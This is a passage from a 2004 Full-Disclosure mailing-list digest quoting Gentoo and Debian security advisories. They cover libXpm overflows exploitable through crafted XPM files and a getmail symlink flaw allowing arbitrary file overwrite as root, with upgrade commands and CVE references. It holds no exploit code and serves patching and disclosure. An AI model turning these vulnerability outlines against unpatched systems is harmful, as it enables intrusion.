> -------------------------------------------------------------------
> # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.
>
> NOTE: Any packages listed without architecture tags apply to all
> architectures...
> -------------------------------------------------------------------
> NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
> MIPS, PPC and SPARC architectures: XFree86 users on those
> architectures should switch to X.org rather than upgrading
> XFree86.
> -------------------------------------------------------------------
> 2 affected packages
> -------------------------------------------------------------------
>
> Description
> ===========
>
> Chris Evans has discovered multiple integer and stack overflow
> vulnerabilities in the X Pixmap library, libXpm, which is a part of the
> X Window System. These overflows can be exploited by the execution of a
> malicious XPM file, which can crash applications that are dependent on
> libXpm.
>
> Impact
> ======
>
> A carefully-crafted XPM file could crash applications that are linked
> against libXpm, potentially allowing the execution of arbitrary code
> with the privileges of the user running the application.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All X.org users should upgrade to the latest version:
>
> # emerge sync
>
> # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
> # emerge ">=x11-base/xorg-x11-6.7.0-r2"
>
> All XFree86 users should upgrade to the latest version:
>
> # emerge sync
>
> # emerge -pv ">=x11-base/xfree-4.3.0-r7"
> # emerge ">=x11-base/xfree-4.3.0-r7"
>
> Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
> PPC and SPARC architectures: XFree86 users on those architectures
> should switch to X.org rather than upgrading XFree86.
>
> References
> ==========
>
> [ 1 ] X.org Security Advisory
> http://freedesktop.org/pipermail/xorg/2004-September/003196.html
> [ 2 ] X11R6.8.1 Release Notes
> http://freedesktop.org/pipermail/xorg/2004-September/003172.html
> [ 3 ] CAN-2004-0687
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
> [ 4 ] CAN-2004-0688
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200409-34.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@...too.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2004 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/1.0
>
> --------------enigEA6620FABBD9968E5B2250AD
> Content-Type: application/pgp-signature; name="signature.asc"
> Content-Description: OpenPGP digital signature
> Content-Disposition: attachment; filename="signature.asc"
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
>
> iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
> oxM9KaPNaz3q7G2WAXIvbrg=
> =OQU0
> -----END PGP SIGNATURE-----
>
> --------------enigEA6620FABBD9968E5B2250AD--
>
> --__--__--
>
> Message: 17
> Date: Mon, 27 Sep 2004 12:34:05 +0200 (CEST)
> Reply-To: full-disclosure@...ts.netsys.com
> From: debian-security-announce@...ts.debian.org
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] [SECURITY] [DSA 553-1] New getmail packages fix root compromise
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - --------------------------------------------------------------------------
> Debian Security Advisory DSA 553-1 security@...ian.org
> http://www.debian.org/security/ Martin Schulze
> September 27th, 2004 http://www.debian.org/security/faq
> - --------------------------------------------------------------------------
>
> Package : getmail
> Vulnerability : symlink vulnerability
> Problem-Type : local
> Debian-specific: no
> CVE ID : CAN-2004-0880 CAN-2004-0881
> Debian Bug : 272561
>
> A security problem has been discovered in getmail, a POP3 and APOP
> mail gatherer and forwarder. An attacker with a shell account on the
> victims host could utilise getmail to overwrite arbitrary files when
> it is running as root.
>
> For the stable distribution (woody) this problem has been fixed in
> version 2.3.7-2.
>
> For the unstable distribution (sid) this problem has been fixed in
> version 3.2.5-1.
>
> We recommend that you upgrade your getmail package.
>
> Upgrade Instructions
> - --------------------
>
> wget url
> will fetch the file for you
> dpkg -i file.deb
> will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
> will update the internal database
> apt-get upgrade
> will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>
> Debian GNU/Linux 3.0 alias woody
> - --------------------------------
>
> Source archives:
>
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.dsc
> Size/MD5 checksum: 583 6263f8d2d75ec3eb21dd302e0b9d6729
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.diff.gz
> Size/MD5 checksum: 2645 ff40d8f72744bfec8a963ece950e0bcd
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7.orig.tar.gz
> Size/MD5 checksum: 70944 4eef6be77a4cbe1a86eef75affd31b05
>
> Architecture independent components:
>
> http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2_all.deb
> Size/MD5 checksum: 74388 f2b9e79b1ddd8ef8bf719d4e1894f051
>
> These files will probably be moved into the stable distribution on
> its next update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce@...ts.debian.org
> Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.5 (GNU/Linux)
>
> iD8DBQFBV+ydW5ql+IAeqTIRAjKVAJ4jTCBi6jY/HaghCNdQUVfyy2giOQCbB688
> 7yr1RQ2U25tXqQDxJZqHyPE=
> =3lYo
> -----END PGP SIGNATURE-----
>
> --__--__--
>
> _______________________________________________
> Full-Disclosure mailing list
> Full-Disclosure@...ts.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
> End of Full-Disclosure Digest
>
Powered by blists - more mailing lists